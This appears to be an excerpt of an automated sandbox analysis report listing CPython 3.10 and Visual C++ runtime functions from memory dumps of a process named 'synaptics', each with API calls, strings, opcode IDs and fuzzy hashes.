                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_FormatTstate$CallCauseError_FatalFromMakeObject_
                                                                                                                                                                                                      • String ID: %R returned NULL without setting an exception$%R returned a result with an exception set$PyThreadState_Get
                                                                                                                                                                                                      • API String ID: 2863226596-2009680459
                                                                                                                                                                                                      • Opcode ID: 33e17f8f88d650ea5f65d36a42803564498b2938b5c526b5770d87d8e7d6ffcd
                                                                                                                                                                                                      • Instruction ID: e71241b9cc5c304beffac563faf99f6f726dd6d8da4bd30807ea48c74218b1c5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33e17f8f88d650ea5f65d36a42803564498b2938b5c526b5770d87d8e7d6ffcd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA21F7357052006BE714DA5D9C01FA673F8DB8172AF50456DF828C7B90EB75E829C7E2
                                                                                                                                                                                                      Function 6C460BF0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\bytesobject.c,000004E5,00000000,00000000,00000000,?,?,6C4534B3,00000000,?,00000000), ref: 6C460C1C
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(expected bytes, %.200s found,?), ref: 6C460C4B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C460C10
                                                                                                                                                                                                      • D:\a\1\s\Objects\bytesobject.c, xrefs: 6C460C0B
                                                                                                                                                                                                      • embedded null byte, xrefs: 6C460C9F
                                                                                                                                                                                                      • expected bytes, %.200s found, xrefs: 6C460C40
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\bytesobject.c$embedded null byte$expected bytes, %.200s found
                                                                                                                                                                                                      • API String ID: 376477240-861970263
                                                                                                                                                                                                      • Opcode ID: eaa3ab6f1b440849faf55659ff6a05a52c0a62e6a74a816356a734e3fcddaec6
                                                                                                                                                                                                      • Instruction ID: f429fb258ee5cb99c8cd6061114ee9daff8f0789105bfa36f29f15df1c59b7d8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eaa3ab6f1b440849faf55659ff6a05a52c0a62e6a74a816356a734e3fcddaec6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2213C767042045BC710CE6EEC41E55B764EB4633EF1403A5ED2C9BFD1D621D85687D0
                                                                                                                                                                                                      Function 6C4B0FA0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 93COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?), ref: 6C4B0FBD
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\setobject.c,00000930), ref: 6C4B0FE4
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73BF18,00000000,00000000,00000000,00000000), ref: 6C4B1032
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C4B0FD8
                                                                                                                                                                                                      • D:\a\1\s\Objects\setobject.c, xrefs: 6C4B0FD3
                                                                                                                                                                                                      • pop from an empty set, xrefs: 6C4B101D
                                                                                                                                                                                                      • P5tl, xrefs: 6C4B0FB0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FormatObjectSubtypeType_
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\setobject.c$P5tl$pop from an empty set
                                                                                                                                                                                                      • API String ID: 120848125-579435917
                                                                                                                                                                                                      • Opcode ID: a0db243b63889997fb74c83e92c6cd0e52543bc094f64e976e1a8e484e16a3dd
                                                                                                                                                                                                      • Instruction ID: 36fcad787e1698c6b5e11a79dcd4be3bf243772e17c988a07ebbbbf183144ef2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0db243b63889997fb74c83e92c6cd0e52543bc094f64e976e1a8e484e16a3dd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5321E1727042059FD710CE69DD81E52B3B8EB81326F148769E918E7F81EB31F8058BB1
                                                                                                                                                                                                      Function 6C44FD80 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • @Btl, xrefs: 6C44FDCB
                                                                                                                                                                                                      • __format__ must return a str, not %.200s, xrefs: 6C44FE78
                                                                                                                                                                                                      • Type %.100s doesn't define __format__, xrefs: 6C44FE30
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: @Btl$Type %.100s doesn't define __format__$__format__ must return a str, not %.200s
                                                                                                                                                                                                      • API String ID: 0-450447382
                                                                                                                                                                                                      • Opcode ID: 0761d49fcf3cc448726bb80091647a076565287df4709bb7c0b226894146bc31
                                                                                                                                                                                                      • Instruction ID: 876b823debb7ec1e021d35b02c2bbf0f574f7b9ea4825f3327e4022e85d4fe86
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0761d49fcf3cc448726bb80091647a076565287df4709bb7c0b226894146bc31
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4931C8716011019FE710CE59DD81D46B3B5EF4533AB34C628ED298BF92DB30E851CBA1
                                                                                                                                                                                                      Function 73A8D1BE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 73A8D20F
                                                                                                                                                                                                      • atol.API-MS-WIN-CRT-CONVERT-L1-1-0(73A8CBD9,73A8CBD9,00000010,00000000,00000000,?,?,?,?,?,?,73A8CBD9,?,73A8D686,00000000,00000000), ref: 73A8D243
                                                                                                                                                                                                      • __telemetry_main_return_trigger.VCRUNTIME140(00000000,?,?,?,?,?,73A8CBD9,?,73A8D686,00000000,00000000), ref: 73A8D24D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Decorator::getDimensionSigned__telemetry_main_return_triggeratol
                                                                                                                                                                                                      • String ID: `template-parameter$void
                                                                                                                                                                                                      • API String ID: 3224638273-4057429177
                                                                                                                                                                                                      • Opcode ID: 12e911a5e339351ded305b10feac60d0a1a1128fee09841410f77cc0aa0d296d
                                                                                                                                                                                                      • Instruction ID: e1fa51038f75dc6ce6671d8badbc3f56eba507f8aacd7e2e8d709ab8d7742699
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12e911a5e339351ded305b10feac60d0a1a1128fee09841410f77cc0aa0d296d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A83161729043099FDF0AEBA5D946BEEB7F9EB08300F20001BD506B7288EF349905CB65
                                                                                                                                                                                                      Function 6C48BD10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyInterpreterState_IDInitref.PYTHON310(?), ref: 6C48BD1E
                                                                                                                                                                                                        • Part of subcall function 6C58EAE0: PyThread_allocate_lock.PYTHON310(?,6C48BCD6,?), ref: 6C58EAF3
                                                                                                                                                                                                        • Part of subcall function 6C58EAE0: _PyErr_SetObject.PYTHON310(?,6C73E920,00000000,00000000,00000000,00000000,?,6C48BCD6,?), ref: 6C58EB20
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73E920,00000000), ref: 6C48BD52
                                                                                                                                                                                                      • _PyInterpreterState_LookUpID.PYTHON310(?,?), ref: 6C48BD8A
                                                                                                                                                                                                      • _PyInterpreterState_IDIncref.PYTHON310(00000000), ref: 6C48BD99
                                                                                                                                                                                                      • _PyObject_New.PYTHON310(?), ref: 6C48BDAA
                                                                                                                                                                                                      • _PyInterpreterState_IDDecref.PYTHON310(00000000), ref: 6C48BDB7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • no interpreter provided, xrefs: 6C48BD3D
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: InterpreterState_$Err_Object$DecrefIncrefInitrefLookObject_Thread_allocate_lock
                                                                                                                                                                                                      • String ID: no interpreter provided
                                                                                                                                                                                                      • API String ID: 2380860835-3477797251
                                                                                                                                                                                                      • Opcode ID: 6daf77651388a5f4afd8780ffd93e4d01d1532e1c4f420a1a6f311ff23e7e9d9
                                                                                                                                                                                                      • Instruction ID: 3449ce059d38b5937904600800931734466cb86945a3ff3733ec745cb5e6dcfa
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6daf77651388a5f4afd8780ffd93e4d01d1532e1c4f420a1a6f311ff23e7e9d9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03212EB6A076146F9220DE667C81D9733ECDE9317A70806B5DD0C97B11F711ED0582F2
                                                                                                                                                                                                      Function 6C44EF60 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyNumber_AsSsize_t.PYTHON310(?), ref: 6C44EFBA
                                                                                                                                                                                                      • PySequence_DelItem.PYTHON310(?,00000000), ref: 6C44EFD5
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,null argument to internal routine), ref: 6C44F02C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • '%.200s' object does not support item deletion, xrefs: 6C44EFFB
                                                                                                                                                                                                      • sequence index must be integer, not '%.200s', xrefs: 6C44EFE7
                                                                                                                                                                                                      • null argument to internal routine, xrefs: 6C44F020
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_ItemNumber_Sequence_Ssize_tString
                                                                                                                                                                                                      • String ID: '%.200s' object does not support item deletion$null argument to internal routine$sequence index must be integer, not '%.200s'
                                                                                                                                                                                                      • API String ID: 3718473444-2233375764
                                                                                                                                                                                                      • Opcode ID: d3a749cf823bfd0ed979d289279362a03847dfd198d1284a9a0a45cf31a51bac
                                                                                                                                                                                                      • Instruction ID: 27701228e8c13eb31d6ce4faa7dff3acfbfaa681500408cfc6e9a6f4e19c1a32
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3a749cf823bfd0ed979d289279362a03847dfd198d1284a9a0a45cf31a51bac
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC21A136702104ABEA00CA69E940FA57379EBC127FF648265E52C8ABD1DB32D85587D0
                                                                                                                                                                                                      Function 6C58AD80 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 69COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(Py_EndInterpreter,thread is not current,6C77B118,?,5B5E5FC0,?,6C58EC69,5B5E5FC0), ref: 6C58ADF6
                                                                                                                                                                                                      • _Py_FatalErrorFunc.PYTHON310(Py_EndInterpreter,thread still has a frame,Py_EndInterpreter,thread is not current,6C77B118,?,5B5E5FC0,?,6C58EC69,5B5E5FC0), ref: 6C58AE05
                                                                                                                                                                                                      • PyImport_AddModuleObject.PYTHON310(00000000,?,6C58EC69,5B5E5FC0), ref: 6C58AE4F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFatalFunc$Import_ModuleObject
                                                                                                                                                                                                      • String ID: Py_EndInterpreter$__main__$thread is not current$thread still has a frame
                                                                                                                                                                                                      • API String ID: 3941278856-2472859702
                                                                                                                                                                                                      • Opcode ID: a6386bda373a7a04d7e6cb6d1f04843e85cc49582af31f2b00517f9d586c55e6
                                                                                                                                                                                                      • Instruction ID: 3512c51356bf6b056d6f93f77d9ff4f219c7fbb3920d1a33ff19deeb49251904
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a6386bda373a7a04d7e6cb6d1f04843e85cc49582af31f2b00517f9d586c55e6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C901F2F22062246BC2109A4DDC07F8377D8AB8A324F118154FE08ABF81D7B0BD4087E9
                                                                                                                                                                                                      Function 6C58DF00 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6C58DF60
                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 6C58DF63
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6C58DF8A
                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 6C58DF8D
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6C58DFB7
                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 6C58DFBA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseCriticalDeleteHandleSection
                                                                                                                                                                                                      • String ID: @bJl
                                                                                                                                                                                                      • API String ID: 1370521891-3213955731
                                                                                                                                                                                                      • Opcode ID: 99c5b4d05f454bfbe50b6804d76051973eecd240afa69fe7b1c7b6dd17be4d5c
                                                                                                                                                                                                      • Instruction ID: 301f1cbceded0c19395922fec8e6b704d464d8cad959d7702f78eb49bf898f9d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99c5b4d05f454bfbe50b6804d76051973eecd240afa69fe7b1c7b6dd17be4d5c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53219532900A049BCB01BF5DDC45B9EFF74FF9A30AF20C21AE84466621D73179A88F94
                                                                                                                                                                                                      Function 6C44ED10 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 59COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,null argument to internal routine), ref: 6C44EE59
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • '%.200s' object is not subscriptable, xrefs: 6C44EE27
                                                                                                                                                                                                      • null argument to internal routine, xrefs: 6C44EE4D
                                                                                                                                                                                                      • ZnlU, xrefs: 6C44EDCB
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
